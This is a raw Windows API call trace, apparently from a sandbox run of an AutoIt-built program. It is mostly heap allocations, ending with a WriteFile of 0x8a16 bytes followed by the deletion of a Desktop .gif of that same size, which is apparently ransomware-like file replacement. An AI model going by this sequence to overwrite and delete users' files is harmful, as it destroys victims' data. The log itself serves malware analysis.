[0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0164.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0164.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0164.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0164.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.624] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0164.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0164.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0164.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0164.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.628] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0164.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd990 [0164.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd990, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.629] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0164.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0164.629] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0x8a16, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0x8a16, lpOverlapped=0x0) returned 1 [0164.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0164.630] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0164.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0164.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.631] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.631] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.631] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.631] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.631] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0164.631] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.631] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0164.633] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.633] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", lpFilePart=0x0) returned 0x4b [0164.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da0eaa0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x47dd5440, ftLastAccessTime.dwHighDateTime=0x1d5e458, ftLastWriteTime.dwLowDateTime=0x78bdf40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8a16, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="JLQ6tYmOaaqJ7B5t.gif", cAlternateFileName="JLQ6TY~1.GIF")) returned 0x90ae18 [0164.635] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\jlq6tymoaaqj7b5t.gif")) returned 1 [0164.639] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da0eaa0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x47dd5440, ftLastAccessTime.dwHighDateTime=0x1d5e458, ftLastWriteTime.dwLowDateTime=0x78bdf40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8a16, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="JLQ6tYmOaaqJ7B5t.gif", cAlternateFileName="JLQ6TY~1.GIF")) returned 0 [0164.639] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0164.641] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.642] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.642] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0164.642] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0164.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 